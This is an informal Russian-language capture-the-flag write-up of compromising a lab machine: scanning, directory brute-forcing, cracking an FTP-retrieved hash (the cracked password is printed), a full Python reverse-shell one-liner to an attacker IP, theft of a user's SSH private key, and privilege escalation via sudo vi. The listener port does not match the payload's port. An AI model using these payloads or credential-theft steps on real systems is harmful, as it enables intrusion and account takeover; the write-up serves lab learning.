1) nmap -A -sV -O <IP-machine>
 обнаруживаю ssh и  http, ftp

2)└─# gobuster -e -u dir <IP-machine>   -w /root/Downloads/common.txt
обнаруживаю страницу с которой можно осуществлять выполнение команд от имени www-data

                                                                    What is Charlie's password?
3)в ftp получаю текстовый документ с хэшем пароля пользователя charlie

┌──(root💀kali)-[~]
└─# hashcat -m 1800 /root/Desktop/us /root/Downloads/rockyou1.txt                                                                               
charlie:cn7824

после безуспешных попыток попасть на ssh пошла на сайт и там ввела, что перенесло меня на страницу которую я обнаружила gobuster, оффф я была зла



                                                                    Enter the key you found!
это скачанный с сайта файл, его я обнаружила командой ls на странице с возможность запуска команд от имени www-data
┌──(root💀kali)-[~/Downloads]
└─# strings key_rev_key              

Enter your name: 
laksdhfas
 congratulations you have found the key:   
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='


так как не получалось зайти на ssh я решила загрузить вредоносную команду на сайт

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.2.224",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

и параллельно у себя

┌──(root💀kali)-[~/Downloads]
└─# rlwrap nc -nlvp 1234

я попробоала загрузить шэлл php для доступа со своего компа, но не было возможности записывать что либо
я поперлась в /home/charlie и там был файл с id_rsa и его скопипастила

и я очень долго пыталась зайти но у меня постоянно выходило bad permission

┌──(root💀kali)-[~/Downloads]
└─# chmod 600 /root/id_rsa 

внимание всегда используйте эту команду перед запуском ssh

┌──(root💀kali)-[~/Downloads]
└─# ssh -i /root/id_rsa  charlie@10.10.51.209
 

 далее очень изично было стать root, был разрешен vi для запуска от лица админа
